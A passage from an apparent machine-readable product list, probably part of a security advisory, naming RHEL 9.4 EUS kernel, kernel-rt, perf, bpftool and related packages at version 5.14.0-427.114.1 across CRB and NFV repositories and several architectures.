"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
